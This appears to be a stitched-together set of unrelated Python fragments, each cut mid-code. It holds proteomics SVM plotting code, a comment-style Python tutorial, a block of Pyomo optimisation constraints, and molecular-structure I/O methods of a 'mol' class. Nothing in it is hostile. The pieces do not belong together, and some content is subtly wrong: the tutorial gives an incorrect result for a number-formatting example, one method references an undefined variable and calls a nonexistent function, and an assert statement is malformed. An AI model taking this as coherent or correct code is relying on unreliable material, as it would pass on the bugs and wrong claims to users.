df_clusterPerformance_global.index.names = ["Experiment", "Type"]
self.df_clusterPerformance_global = df_clusterPerformance_global.T
df_AvgClusterPerformance_global = pd.DataFrame.from_dict({(i,j): global_SVM_dict_total[i][j]
for i in global_SVM_dict_total.keys()
for j in global_SVM_dict_total[i].keys()},
orient='index')
df_AvgClusterPerformance_global.index.names = ["Experiment", "Type"]
self.df_AvgClusterPerformance_global = df_AvgClusterPerformance_global.T
self.cache_stored_SVM = True
return
def svm_plotting(self, multi_choice):
"""
The markerperformance (line/scatter plot) as well as marker prediction accuracy (bar plot) is visuaized.
Args:
self: df_AvgClusterPerformance_global
df_clusterPerformance_global
multi_choice: list of experiment names
"""
df_clusterPerformance_global = self.df_clusterPerformance_global
df_AvgClusterPerformance_global = self.df_AvgClusterPerformance_global
df_AvgAllCluster = df_AvgClusterPerformance_global.xs("Avg. all clusters", level='Type', axis=1)
fig_markerPredictionAccuracy = go.Figure()#data=[go.Bar(x=df_test.columns, y=df_test.loc["Recall"])])
for exp in multi_choice:
fig_markerPredictionAccuracy.add_trace(go.Bar(x=[exp], y=[df_AvgAllCluster[exp].loc["Recall"]], name=exp))
fig_markerPredictionAccuracy.update_layout(template="simple_white", #showlegend=False,
title="Marker prediction accuracy - Overall recall",
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="Marker prediction accuracy [%]",
mirror=True),
)
fig_clusterPerformance = go.Figure()
list_data_type = ["Avg. all clusters", "Avg. all organelles"]
for i,exp in enumerate(multi_choice):
df_clusterPerformance = df_clusterPerformance_global.xs(exp, level='Experiment', axis=1)
df_AvgClusterPerformance = df_AvgClusterPerformance_global.xs(exp, level='Experiment', axis=1)
fig_clusterPerformance.add_trace(go.Scatter(x=df_clusterPerformance.columns, y=df_clusterPerformance.loc["F1"],
marker=dict(color=pio.templates["simple_white"].layout["colorway"][i]), name=exp))
for data_type in list_data_type:
fig_clusterPerformance.add_trace(go.Scatter(x=[data_type], y=[df_AvgClusterPerformance[data_type].loc["F1"]],
mode="markers",
showlegend=False,
marker=dict(color=pio.templates["simple_white"].layout["colorway"][i])
))
fig_clusterPerformance.update_layout(template="simple_white", #showlegend=False,
title="Cluster wise SVM analysis",
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="F1 score", #- harmonic mean of recall and precision
mirror=True),
)
return fig_markerPredictionAccuracy, fig_clusterPerformance
def __repr__(self):
return str(self.__dict__)
#return "This is a spatial dataset with {} lines.".format(len(self.df_original))
def svm_heatmap(df_SVM):
"""
The misclassification matrix, generated by Perseus, will be displayed as a heatmap.
Args:
self.df_SVM: dataframe, provided by Perseus, no index;
Column names: e.g. "Predicted: ER", "Predicted: NPC"
Rows: e.g. "True: ER", "True: NPC"
Returns:
fig_SVMheatmap: heatmap of the misclassification matrix
"""
#df_SVM = self.df_SVM.copy()
#if hasattr(df_SVM, "keys") == True:
try:
df_SVM = pd.read_json(df_SVM["Misclassification Matrix"])
df_SVM = df_SVM.set_index("T: True group")[::-1]
except:
df_SVM = df_SVM.set_index("T: True group")[::-1]
y_axis_label = df_SVM.index
x_axis_label = df_SVM.columns
data_svm = df_SVM.values
fig_SVMheatmap = go.Figure()
fig_SVMheatmap.add_trace(go.Heatmap(
z=data_svm,
x = x_axis_label,
y = y_axis_label,
colorscale=[
[0.0, "green"],
[0.01, "white"],
[1.0, "red"]
],
))
return fig_SVMheatmap
def reframe_df_01_fromJson_for_Perseus(json_dict):
"""
Make 0-1 normalized data from all experiments available for Perseus
Args:
json: dictionary, json file uploaded in manage dataset tab.
Return:
df: 0-1 normlaized data (globally normalized), with Gene names, Protein IDs, Comaprtment as columns
Pattern for Column data: Exp_Map_Fraction
"""
for exp_name in json_dict.keys():
for data_type in json_dict[exp_name].keys():
if data_type == "0/1 normalized data" and exp_name == list(json_dict.keys())[0]:
df_01_combined | |
####################################################
## 0. Useful stuff about Python
####################################################
# Pyhton Enhancement Proposals, or PEPs, are useful conventions which guide
# the user in writing readable and pretty code, as well as many other
# details about Python. PEP-8 is the Style Guide (https://www.python.org/dev/peps/pep-0008/)
# According to PEP-8, line length should be limited to 79 characters
# No brackets are used for code blocks. Instead, indentation is used
# The general consensus is to use 4 spaces, but it is not necessary
# What is necessary is to NOT mix tabs and spaces. Python will complain
# NOTE: You can still press the "Tab" key, but make sure your IDE is set
# up so that it will type 4 spaces per press.
# snake_case is the norm, as opposed to camelCase as is standard in other
# languages
# Single line comments start with a hash symbol.
""" Multiline strings can be written
using three "s, and are often used
as documentation (docstrings).
"""
type(a_variable) # Used to find out the type of a variable
help(an_object) # Used to print documentation about a class or function (the
# ones written in the triple double-quotes)
dir(an_object) # Used to find all the variable and function names of
# an object or module
# Special Python variables will be surrounded by double underscores.
# A particularly useful one is __name__, which lets the module know
# if it is the one being executed as the main program, in which case that
# module's __name__ = "__main__", otherwise it will be its own filename.
# https://www.geeksforgeeks.org/__name__-special-variable-python/
# EVERYTHING in Python is an object
# Python has a print function. We'll look at functions later, for now:
print("I'm Python. Nice to meet you!") # => I'm Python. Nice to meet you!
# By default the print function also prints out a newline at the end.
# Use the optional argument end to change the end string.
print("Hello, World", end="!") # => Hello, World!
# Simple way to get user input data from console
input_string_var = input("Enter some data: ") # Returns the data as a string
# Note: In earlier versions of Python, input() method was named as raw_input()
####################################################
## 1. Primitive Datatypes and Operators
####################################################
# Math is what you would expect
1 + 1 # => 2
8 - 1 # => 7
10 * 2 # => 20
35 / 5 # => 7.0
# Integer division rounds down for both positive and negative numbers.
5 // 3 # => 1
-5 // 3 # => -2
5.0 // 3.0 # => 1.0 # works on floats too
-5.0 // 3.0 # => -2.0
# The result of division is always a float
10.0 / 3 # => 3.3333333333333335
# Modulo operation
7 % 3 # => 1
# Exponentiation (x**y, x to the yth power)
2**3 # => 8
# Enforce precedence with parentheses
1 + 3 * 2 # => 7
(1 + 3) * 2 # => 8
# Round numbers manually with round()
round(5.5) # => 6
round(5.758, 2) # => 5.76
# Work in other bases (binary, octal and hexadecimal)
0b10 # => 2
0o10 # => 8
0x10 # => 16
# Scientific notation is also accepted
2.99e8
1.65e-30
# Using underscores, you can make large numbers more legible
10000000 == 10_000_000 # => True
# Boolean values are primitives (Note: the capitalization)
True # => True
False # => False
# negate with not
not True # => False
not False # => True
# Boolean Operators
# Note "and" and "or" are case-sensitive
True and False # => False
False or True # => True
# True and False are actually 1 and 0 but with different keywords
True + True # => 2
True * 8 # => 8
False - 5 # => -5
# Comparison operators look at the numerical value of True and False
0 == False # => True
1 == True # => True
2 == True # => False
-5 != False # => True
# Using boolean logical operators on ints casts them to booleans for evaluation, but their non-cast value is returned
# Don't mix up with bool(ints) and bitwise and/or (&,|)
bool(0) # => False
bool(0.0) # => False
bool(4) # => True
bool(-6) # => True
0 and 2 # => 0
-5 or 0 # => -5
# Equality is ==
1 == 1 # => True
2 == 1 # => False
# Inequality is !=
1 != 1 # => False
2 != 1 # => True
# More comparisons
1 < 10 # => True
1 > 10 # => False
2 <= 2 # => True
2 >= 2 # => True
# Seeing whether a value is in a range
1 < 2 and 2 < 3 # => True
2 < 3 and 3 < 2 # => False
# Chaining makes this look nicer
1 < 2 < 3 # => True
2 < 3 < 2 # => False
# (is vs. ==) is checks if two variables refer to the same object, but == checks
# if the objects pointed to have the same values.
a = [1, 2, 3, 4] # Point a at a new list, [1, 2, 3, 4]
b = a # Point b at what a is pointing to
b is a # => True, a and b refer to the same object
b == a # => True, a's and b's objects are equal
b = [1, 2, 3, 4] # Point b at a new list, [1, 2, 3, 4]
b is a # => False, a and b do not refer to the same object
b == a # => True, a's and b's objects are equal
# Strings are created with " or '. There is no 'char' type unlike in other languages
"This is a string."
'This is also a string.'
# Strings can be added too! But try not to do this.
"Hello " + "world!" # => "Hello world!"
# String literals (but not variables) can be concatenated without using '+'
"Hello " "world!" # => "Hello world!"
# A string can be treated like a list of characters
"Hello world!"[0] # => 'H'
# You can find the length of a string
len("This is a string") # => 16
# You can split strings based on a delimiter, by default, space
"This string".split()
# You can also format using f-strings or formatted string literals (in Python 3.6+)
name = "Reiko"
f"She said her name is {name}." # => "She said her name is Reiko"
# You can basically put any Python statement inside the braces and it will be output in the string.
f"{name} is {len(name)} characters long." # => "Reiko is 5 characters long."
number = 250_000_000
f"{number:,}" # => 100,000,000
# And raw strings too
path = r"C:\Users\Documents" # => Prints it as is
# Bytes are a thing, usually used when working with raw binary data
data = b"some binaty data"
# Python allows encoding and decoding of said data into strings and viceversa
string_1 = "Hey, thís is ä string with Ùnicode charactêrs"
bytes_1 = string_1.encode("utf-8") # => b'Hey, th\xc3\xads is \xc3\xa4 string with \xc3\x99nicode charact\xc3\xaars'
bytes_1.decode("utf-8") # => Hey, thís is ä string with Ùnicode charactêrs
# 'None' is an object too
None # => None
# Don't use the equality "==" symbol to compare objects to None
# Use "is" instead. This checks for equality of object identity.
"etc" is None # => False
None is None # => True
# None, 0, and empty strings/lists/dicts/tuples all evaluate to False.
# All other values are True
bool(0) # => False
bool("") # => False
bool("False") # => True
bool([]) # => False
bool({}) # => False
bool(()) # => False
# Casting is available through constructors
int(-2.5) # => -2
int("340")
float(2)
float("2467")
str(450)
# And you can even get infinity
float("inf")
float("-inf")
####################################################
## 2. Variables and Collections
####################################################
# There are no declarations, only assignments. A new object is created
# on every assignment, but x = 300, x = 5, x = 300 will have created 2
# separate int objects. Technically, variables in Python are actually
# references to objects
some_var = 5
some_var # => 5
# Accessing a previously unassigned variable is an exception.
# See Control Flow to learn more about exception handling.
some_unknown_var # Raises a NameError
# if can be used as an expression
# Equivalent of C's '?:' ternary operator
"yahoo!" if 3 > 2 else 2 # => "yahoo!"
# Un-pythonic alternative, usually best to avoid it
(value_if_false, value_if_true)[test]
# Lists store sequences
li = []
# You can start | |
= Constraint(expr= m.x49 - m.x286 - m.x289 == 0)
m.c215 = Constraint(expr= m.x62 - m.x314 - m.x320 == 0)
m.c216 = Constraint(expr= m.x63 - m.x315 - m.x321 == 0)
m.c217 = Constraint(expr= m.x64 - m.x316 - m.x322 == 0)
m.c218 = Constraint(expr= m.x284 - 3.34221486003388*m.b611 <= 0)
m.c219 = Constraint(expr= m.x285 - 3.34221486003388*m.b612 <= 0)
m.c220 = Constraint(expr= m.x286 - 3.34221486003388*m.b613 <= 0)
m.c221 = Constraint(expr= m.x287 + 3.34221486003388*m.b611 <= 3.34221486003388)
m.c222 = Constraint(expr= m.x288 + 3.34221486003388*m.b612 <= 3.34221486003388)
m.c223 = Constraint(expr= m.x289 + 3.34221486003388*m.b613 <= 3.34221486003388)
m.c224 = Constraint(expr= m.x314 - 1.83548069293539*m.b611 <= 0)
m.c225 = Constraint(expr= m.x315 - 1.83548069293539*m.b612 <= 0)
m.c226 = Constraint(expr= m.x316 - 1.83548069293539*m.b613 <= 0)
m.c227 = Constraint(expr= m.x320 + 1.83548069293539*m.b611 <= 1.83548069293539)
m.c228 = Constraint(expr= m.x321 + 1.83548069293539*m.b612 <= 1.83548069293539)
m.c229 = Constraint(expr= m.x322 + 1.83548069293539*m.b613 <= 1.83548069293539)
m.c230 = Constraint(expr=(m.x326/(0.001 + 0.999*m.b614) - 0.9*log(1 + m.x290/(0.001 + 0.999*m.b614)))*(0.001 + 0.999*
m.b614) <= 0)
m.c231 = Constraint(expr=(m.x327/(0.001 + 0.999*m.b615) - 0.9*log(1 + m.x291/(0.001 + 0.999*m.b615)))*(0.001 + 0.999*
m.b615) <= 0)
m.c232 = Constraint(expr=(m.x328/(0.001 + 0.999*m.b616) - 0.9*log(1 + m.x292/(0.001 + 0.999*m.b616)))*(0.001 + 0.999*
m.b616) <= 0)
m.c233 = Constraint(expr= m.x293 == 0)
m.c234 = Constraint(expr= m.x294 == 0)
m.c235 = Constraint(expr= m.x295 == 0)
m.c236 = Constraint(expr= m.x332 == 0)
m.c237 = Constraint(expr= m.x333 == 0)
m.c238 = Constraint(expr= m.x334 == 0)
m.c239 = Constraint(expr= m.x50 - m.x290 - m.x293 == 0)
m.c240 = Constraint(expr= m.x51 - m.x291 - m.x294 == 0)
m.c241 = Constraint(expr= m.x52 - m.x292 - m.x295 == 0)
m.c242 = Constraint(expr= m.x65 - m.x326 - m.x332 == 0)
m.c243 = Constraint(expr= m.x66 - m.x327 - m.x333 == 0)
m.c244 = Constraint(expr= m.x67 - m.x328 - m.x334 == 0)
m.c245 = Constraint(expr= m.x290 - 3.34221486003388*m.b614 <= 0)
m.c246 = Constraint(expr= m.x291 - 3.34221486003388*m.b615 <= 0)
m.c247 = Constraint(expr= m.x292 - 3.34221486003388*m.b616 <= 0)
m.c248 = Constraint(expr= m.x293 + 3.34221486003388*m.b614 <= 3.34221486003388)
m.c249 = Constraint(expr= m.x294 + 3.34221486003388*m.b615 <= 3.34221486003388)
m.c250 = Constraint(expr= m.x295 + 3.34221486003388*m.b616 <= 3.34221486003388)
m.c251 = Constraint(expr= m.x326 - 1.32154609891348*m.b614 <= 0)
m.c252 = Constraint(expr= m.x327 - 1.32154609891348*m.b615 <= 0)
m.c253 = Constraint(expr= m.x328 - 1.32154609891348*m.b616 <= 0)
m.c254 = Constraint(expr= m.x332 + 1.32154609891348*m.b614 <= 1.32154609891348)
m.c255 = Constraint(expr= m.x333 + 1.32154609891348*m.b615 <= 1.32154609891348)
m.c256 = Constraint(expr= m.x334 + 1.32154609891348*m.b616 <= 1.32154609891348)
m.c257 = Constraint(expr=(m.x338/(0.001 + 0.999*m.b617) - log(1 + m.x269/(0.001 + 0.999*m.b617)))*(0.001 + 0.999*m.b617)
<= 0)
m.c258 = Constraint(expr=(m.x339/(0.001 + 0.999*m.b618) - log(1 + m.x270/(0.001 + 0.999*m.b618)))*(0.001 + 0.999*m.b618)
<= 0)
m.c259 = Constraint(expr=(m.x340/(0.001 + 0.999*m.b619) - log(1 + m.x271/(0.001 + 0.999*m.b619)))*(0.001 + 0.999*m.b619)
<= 0)
m.c260 = Constraint(expr= m.x275 == 0)
m.c261 = Constraint(expr= m.x276 == 0)
m.c262 = Constraint(expr= m.x277 == 0)
m.c263 = Constraint(expr= m.x341 == 0)
m.c264 = Constraint(expr= m.x342 == 0)
m.c265 = Constraint(expr= m.x343 == 0)
m.c266 = Constraint(expr= m.x41 - m.x269 - m.x275 == 0)
m.c267 = Constraint(expr= m.x42 - m.x270 - m.x276 == 0)
m.c268 = Constraint(expr= m.x43 - m.x271 - m.x277 == 0)
m.c269 = Constraint(expr= m.x68 - m.x338 - m.x341 == 0)
m.c270 = Constraint(expr= m.x69 - m.x339 - m.x342 == 0)
m.c271 = Constraint(expr= m.x70 - m.x340 - m.x343 == 0)
m.c272 = Constraint(expr= m.x269 - 2.54515263975353*m.b617 <= 0)
m.c273 = Constraint(expr= m.x270 - 2.54515263975353*m.b618 <= 0)
m.c274 = Constraint(expr= m.x271 - 2.54515263975353*m.b619 <= 0)
m.c275 = Constraint(expr= m.x275 + 2.54515263975353*m.b617 <= 2.54515263975353)
m.c276 = Constraint(expr= m.x276 + 2.54515263975353*m.b618 <= 2.54515263975353)
m.c277 = Constraint(expr= m.x277 + 2.54515263975353*m.b619 <= 2.54515263975353)
m.c278 = Constraint(expr= m.x338 - 1.26558121681553*m.b617 <= 0)
m.c279 = Constraint(expr= m.x339 - 1.26558121681553*m.b618 <= 0)
m.c280 = Constraint(expr= m.x340 - 1.26558121681553*m.b619 <= 0)
m.c281 = Constraint(expr= m.x341 + 1.26558121681553*m.b617 <= 1.26558121681553)
m.c282 = Constraint(expr= m.x342 + 1.26558121681553*m.b618 <= 1.26558121681553)
m.c283 = Constraint(expr= m.x343 + 1.26558121681553*m.b619 <= 1.26558121681553)
m.c284 = Constraint(expr= - 0.9*m.x296 + m.x344 == 0)
m.c285 = Constraint(expr= - 0.9*m.x297 + m.x345 == 0)
m.c286 = Constraint(expr= - 0.9*m.x298 + m.x346 == 0)
m.c287 = Constraint(expr= m.x299 == 0)
m.c288 = Constraint(expr= m.x300 == 0)
m.c289 = Constraint(expr= m.x301 == 0)
m.c290 = Constraint(expr= m.x347 == 0)
m.c291 = Constraint(expr= m.x348 == 0)
m.c292 = Constraint(expr= m.x349 == 0)
m.c293 = Constraint(expr= m.x53 - m.x296 - m.x299 == 0)
m.c294 = Constraint(expr= m.x54 - m.x297 - m.x300 == 0)
m.c295 = Constraint(expr= m.x55 - m.x298 - m.x301 == 0)
m.c296 = Constraint(expr= m.x71 - m.x344 - m.x347 == 0)
m.c297 = Constraint(expr= m.x72 - m.x345 - m.x348 == 0)
m.c298 = Constraint(expr= m.x73 - m.x346 - m.x349 == 0)
m.c299 = Constraint(expr= m.x296 - 15*m.b620 <= 0)
m.c300 = Constraint(expr= m.x297 - 15*m.b621 <= 0)
m.c301 = Constraint(expr= m.x298 - 15*m.b622 <= 0)
m.c302 = Constraint(expr= m.x299 + 15*m.b620 <= 15)
m.c303 = Constraint(expr= m.x300 + 15*m.b621 <= 15)
m.c304 = Constraint(expr= m.x301 + 15*m.b622 <= 15)
m.c305 = Constraint(expr= m.x344 - 13.5*m.b620 <= 0)
m.c306 = Constraint(expr= m.x345 - 13.5*m.b621 <= 0)
m.c307 = Constraint(expr= m.x346 - 13.5*m.b622 <= 0)
m.c308 = Constraint(expr= m.x347 + 13.5*m.b620 <= 13.5)
m.c309 = Constraint(expr= m.x348 + 13.5*m.b621 <= 13.5)
m.c310 = Constraint(expr= m.x349 + 13.5*m.b622 <= 13.5)
m.c311 = Constraint(expr= - 0.6*m.x302 + m.x350 == 0)
m.c312 = Constraint(expr= - 0.6*m.x303 + m.x351 == 0)
m.c313 = Constraint(expr= - 0.6*m.x304 + m.x352 == 0)
m.c314 = Constraint(expr= m.x305 == 0)
m.c315 = Constraint(expr= m.x306 == 0)
m.c316 = Constraint(expr= m.x307 == 0)
m.c317 = Constraint(expr= m.x353 == 0)
m.c318 = Constraint(expr= m.x354 == 0)
m.c319 = Constraint(expr= m.x355 == 0)
m.c320 = Constraint(expr= m.x56 - m.x302 - m.x305 == 0)
m.c321 = Constraint(expr= m.x57 - m.x303 - m.x306 == 0)
m.c322 = Constraint(expr= m.x58 - m.x304 - m.x307 == 0)
m.c323 = Constraint(expr= m.x74 - m.x350 - m.x353 == 0)
m.c324 = Constraint(expr= m.x75 - m.x351 - m.x354 == 0)
m.c325 = Constraint(expr= m.x76 - m.x352 - m.x355 == 0)
m.c326 = Constraint(expr= m.x302 - 15*m.b623 <= 0)
m.c327 = Constraint(expr= m.x303 - 15*m.b624 <= 0)
m.c328 = Constraint(expr= m.x304 - 15*m.b625 <= 0)
m.c329 = Constraint(expr= m.x305 + 15*m.b623 <= 15)
m.c330 = Constraint(expr= m.x306 + 15*m.b624 <= 15)
m.c331 = Constraint(expr= m.x307 + 15*m.b625 <= 15)
m.c332 = Constraint(expr= m.x350 - 9*m.b623 <= 0)
m.c333 = Constraint(expr= m.x351 - 9*m.b624 <= 0)
m.c334 = Constraint(expr= m.x352 - 9*m.b625 <= 0)
m.c335 = Constraint(expr= m.x353 + 9*m.b623 <= 9)
m.c336 = Constraint(expr= m.x354 + 9*m.b624 <= 9)
m.c337 = Constraint(expr= m.x355 + 9*m.b625 <= 9)
m.c338 = Constraint(expr=(m.x356/(0.001 + 0.999*m.b626) - 1.1*log(1 + m.x308/(0.001 + 0.999*m.b626)))*(0.001 + 0.999*
m.b626) <= 0)
m.c339 = Constraint(expr=(m.x357/(0.001 + 0.999*m.b627) - 1.1*log(1 + m.x309/(0.001 + 0.999*m.b627)))*(0.001 + 0.999*
m.b627) <= 0)
m.c340 = Constraint(expr=(m.x358/(0.001 + 0.999*m.b628) - 1.1*log(1 + m.x310/(0.001 + 0.999*m.b628)))*(0.001 + 0.999*
m.b628) <= 0)
m.c341 = Constraint(expr= m.x311 == 0)
m.c342 = Constraint(expr= m.x312 == 0)
m.c343 = Constraint(expr= m.x313 == 0)
m.c344 = Constraint(expr= m.x359 == 0)
m.c345 = Constraint(expr= m.x360 == 0)
m.c346 = Constraint(expr= m.x361 == 0)
m.c347 = Constraint(expr= m.x59 - m.x308 - m.x311 == 0)
m.c348 = Constraint(expr= m.x60 - m.x309 - m.x312 == 0)
m.c349 = Constraint(expr= m.x61 - m.x310 - m.x313 == 0)
m.c350 = Constraint(expr= m.x77 - m.x356 - m.x359 == 0)
m.c351 = Constraint(expr= m.x78 - m.x357 - m.x360 == 0)
m.c352 = Constraint(expr= m.x79 - m.x358 - m.x361 == 0)
m.c353 = Constraint(expr= m.x308 - 15*m.b626 <= 0)
m.c354 = Constraint(expr= m.x309 - 15*m.b627 <= 0)
m.c355 = Constraint(expr= m.x310 - 15*m.b628 <= 0)
m.c356 = Constraint(expr= m.x311 + 15*m.b626 <= 15)
m.c357 = Constraint(expr= m.x312 + 15*m.b627 <= 15)
m.c358 = Constraint(expr= m.x313 + 15*m.b628 <= 15)
m.c359 = Constraint(expr= m.x356 - 3.04984759446376*m.b626 <= 0)
m.c360 = Constraint(expr= m.x357 - 3.04984759446376*m.b627 <= 0)
m.c361 = Constraint(expr= m.x358 - 3.04984759446376*m.b628 <= 0)
m.c362 = Constraint(expr= m.x359 + 3.04984759446376*m.b626 <= 3.04984759446376)
m.c363 = Constraint(expr= m.x360 + 3.04984759446376*m.b627 <= 3.04984759446376)
m.c364 = Constraint(expr= m.x361 + 3.04984759446376*m.b628 <= 3.04984759446376)
m.c365 = Constraint(expr= - 0.9*m.x317 + m.x416 == 0)
m.c366 = Constraint(expr= - 0.9*m.x318 + m.x417 == 0)
m.c367 = Constraint(expr= - 0.9*m.x319 + m.x418 == 0)
m.c368 = Constraint(expr= - m.x374 + m.x416 == 0)
m.c369 = Constraint(expr= - m.x375 + m.x417 == 0)
m.c370 = Constraint(expr= - m.x376 + m.x418 == 0)
m.c371 = Constraint(expr= m.x323 == 0)
m.c372 = Constraint(expr= m.x324 == 0)
m.c373 = Constraint(expr= m.x325 == 0)
m.c374 = Constraint(expr= m.x377 == 0)
m.c375 = Constraint(expr= m.x378 == 0)
m.c376 = Constraint(expr= m.x379 == 0)
m.c377 = Constraint(expr= m.x419 == 0)
m.c378 = Constraint(expr= m.x420 == 0)
m.c379 = Constraint(expr= m.x421 == 0)
m.c380 = Constraint(expr= m.x62 - m.x317 - m.x323 == 0)
m.c381 = Constraint(expr= m.x63 - m.x318 - m.x324 == 0)
m.c382 = Constraint(expr= m.x64 - m.x319 - m.x325 == 0)
m.c383 = Constraint(expr= m.x86 - m.x374 - m.x377 == 0)
m.c384 = Constraint(expr= m.x87 - m.x375 - m.x378 == 0)
m.c385 = Constraint(expr= | |
of the periodic site.
###
elems.append(site.species.elements[0].name.lower())
fracs.append([site.frac_coords[0],site.frac_coords[1], site.frac_coords[2]])
fracs = np.array(fracs)
m.natoms=len(elems)
m.set_elems(elems)
m.set_atypes(elems)
m.set_cell(cell)
m.set_xyz_from_frac(fracs)
m.set_nofrags()
m.set_empty_conn()
m.detect_conn()
return m
@classmethod
def from_ff(cls, basename, fit = False):
m = cls()
m.read(basename)
m.addon("ff")
m.ff.read(basename, fit = fit)
return m
@classmethod
def from_array(cls, arr, **kwargs):
''' generic reader for the mol class, reading from a Nx3 array
Parameters:
arr : the array to be read
**kwargs : all options of the parser are passed by the kwargs
see molsys.io.* for detailed info'''
m = cls()
logger.info("reading array")
assert arr.shape[1] == 3, "Wrong array dimension (second must be 3): %s" % (arr.shape,)
formats.read['array'](m,arr,**kwargs)
return m
@classmethod
def from_nested_list(cls, nestl, **kwargs):
''' generic reader for the mol class, reading from a Nx3 array
Parameters:
arr : the array to be read
**kwargs : all options of the parser are passed by the kwargs
see molsys.io.* for detailed info'''
logger.info("reading nested lists")
for nl in nestl:
assert len(nl) == 3, "Wrong nested list lenght (must be 3): %s" % (arr.shape,)
arr = np.array(nestl)
return cls.fromArray(arr, **kwargs)
@classmethod
def from_cp2k_restart(cls, restart, **kwargs):
''' reads and parses a cp2k restart file
Parameters:
restart : restart filename
**kwargs : all options of the parser are passed by the kwargs
see molsys.io.* for detailed info'''
f = open(restart)
txt = f.read()
# coords
xyz_str = [x for x in txt.split('&COORD',1)[-1].rsplit('&END COORD',1)[0].split('\n') if x.strip() != '']
elems = [x.split()[0] for x in xyz_str]
coords = np.array([[float(y) for i,y in enumerate(x.split()) if i != 0] for x in xyz_str])
cell = np.array([[float(y) for y in x.split()[1:]] for x in txt.split('&CELL\n',1)[-1].split('&END CELL\n')[0].split('\n')[0:3]])
m = cls.from_array(coords)
m.cp2ktxt = txt
m.natoms = len(coords)
m.set_xyz(coords)
m.set_cell(cell,cell_only=True)
m.elems = elems
m.set_nofrags()
m.detect_conn()
m.atypes = elems
return m
@classmethod
def from_systrekey(cls, skey, **kwargs):
"""generate a mol/topo object from a systrekey as the barycentric embedding
it is necessary to have graph_tool installed in order to run lqg
Args:
skey (string): the systrekey
"""
from .util.lqg import lqg
l = lqg()
l.read_systre_key(skey)
l()
m = cls()
m.natoms = l.nvertices
m.set_cell(l.cell)
m.set_xyz_from_frac(l.frac_xyz)
m.set_empty_conn()
m.set_empty_pconn()
for i,e in enumerate(l.edges):
m.conn[e[0]].append(e[1])
m.conn[e[1]].append(e[0])
m.pconn[e[0]].append(np.array(l.labels[i]))
m.pconn[e[1]].append(-1*np.array(l.labels[i]))
# TODO: set types properly
m.set_atypes(l.nvertices*['1'])
for i in range(m.natoms):
e = elements.topotypes[len(m.conn[i])]
m.elems.append(e)
m.is_topo = True
m.use_pconn = True
return m
@classmethod
def from_mfp5(cls, fname, stage, traj=True):
"""generate mol object from mfp5 file
Args:
fname (string): name of mfp5 file
stage (string): stage name
traj (bool, optional): if a trajectory info is present load addon and set source. Defaults to True.
Returns:
molobejct: generated mol object
"""
from molsys.util import mfp5io
# instantiate the imfp5io reader
pio = mfp5io.mfp5io(fname, restart=stage, filemode="r")
# get the mol obejct from the mfp5 file
m = pio.get_mol_from_system()
pio.close()
if traj:
m.addon("traj", source="mfp5", fname=fname, stage=stage)
return m
def to_phonopy(self, hessian = None):
"""
Method to create a phonopy object for lattice dynamic calculations.
Kwargs:
hessian (numpy.ndarray, optional): Defaults to None. Hessian matrix of
shape (3N,3N) in kcal/mol/A**2.
Raises:
ImportError: Raises Import Error when phonopy is not installed
Returns:
[Phonopy]: Return the phonopy object.
"""
try:
from phonopy import Phonopy
from phonopy.structure.atoms import PhonopyAtoms
from phonopy.units import ElkToTHz
except:
raise ImportError("Phonopy is not available!")
assert self.periodic == True; "Requested system is not periodic!"
unitcell = PhonopyAtoms(symbols = [i.title() for i in self.get_elems()],
cell = self.get_cell(), scaled_positions = self.get_frac_from_xyz())
# phonopy is setup by assuming atomic units for the hessian matrix
phonon = Phonopy(unitcell, [[1,0,0],[0,1,0],[0,0,1]], factor = ElkToTHz)
if hessian is not None:
# we convert here the hessian to the phonopy format and to atomic units
hessian *= kcalmol/angstrom**2
h2 = np.zeros((self.natoms,self.natoms,3,3), dtype = "double")
for i in range(self.natoms):
for j in range(self.natoms):
i3,j3 = 3*i, 3*j
h2[i,j,:,:]=hessian[i3:i3+3, j3:j3+3]
phonon.set_force_constants(h2)
return phonon
def write(self, fname, ftype=None, rank=None, **kwargs):
''' generic writer for the mol class
Parameters:
fname : the filename to be written
ftype="mfpx" : the parser type that is used to writen the file
rank : deault: None, if not None but integer write if rank = 0 (e.g. we use partitions, then rank is partition rank)
**kwargs : all options of the parser are passed by the kwargs
see molsys.io.* for detailed info'''
if rank is not None:
# if rank is given return only when rank is not zero (mpi_rank can be nonzero!)
if rank != 0:
return
else:
# otherise use mpi_rank
if self.mpi_rank != 0:
return
if ftype is None:
fsplit = fname.rsplit('.',1)[-1]
if fsplit != fname: #there is an extension
ftype = fsplit #ftype is inferred from extension
else: #there is no extension
ftype = 'mfpx' #default
logger.info("writing file "+str(fname)+' in '+str(ftype)+' format')
if ftype in formats.write:
with open(fname,"w") as f:
formats.write[ftype](self,f,**kwargs)
else:
logger.error("unsupported format: %s" % ftype)
raise IOError("Unsupported format")
return
def to_string(self, ftype='mfpx', **kwargs):
"""
Method to output mol object as string in the format
of the given filetype.
Kwargs:
ftype(string): name of the filetype, default to mfpx
Raises:
IOError
Returns:
string: mol object as string
"""
f = StringIO()
logger.info("writing string as %s" % str(ftype))
if ftype in formats.write:
formats.write[ftype](self,f,**kwargs)
else:
logger.error("unsupported format: %s" % ftype)
raise IOError("Unsupported format")
return f.getvalue()
def to_fileobject(self,f, ftype ="mfpx", **kwargs):
logger.info("writing string as %s" % str(ftype))
if ftype in formats.write:
formats.write[ftype](self,f,**kwargs)
else:
logger.error("unsupported format: %s" % ftype)
raise IOError("Unsupported format")
return f
def view(self, ftype='txyz', program=None, opts=(), **kwargs):
''' launch graphics visualisation tool, i.e. moldenx.
Debugging purpose.'''
if self.mpi_rank == 0:
logger.info("invoking %s as visualisation tool" % (program,))
pid = str(os.getpid())
_tmpfname = "_tmpfname_%s.%s" % (pid, ftype)
self.write(_tmpfname, ftype=ftype, **kwargs)
if program is None:
program = "moldenx"
if opts == () and program == "moldenx":
opts = ('-a', '-l', '-S', '-hoff', '-geom', '1080x1080')
try:
ret = subprocess.call([program, _tmpfname] + list(opts))
except KeyboardInterrupt:
pass
finally:
try:
os.remove(_tmpfname)
logger.info("temporary file "+_tmpfname+" removed")
except:
logger.warning("temporary file "+_tmpfname+" removed during view!")
return
def molden(self, opts=(), **kwargs):
if opts == ():
opts = ('-a', '-l', '-S', '-hoff', '-geom', '1080x1080')
if self.mpi_rank == 0:
self.view(ftype='txyz', program='moldenx', opts=opts, **kwargs)
def pymol(self, opts=(), **kwargs):
if self.mpi_rank == 0:
self.view(ftype='txyz', program='pymol', opts=opts, **kwargs)
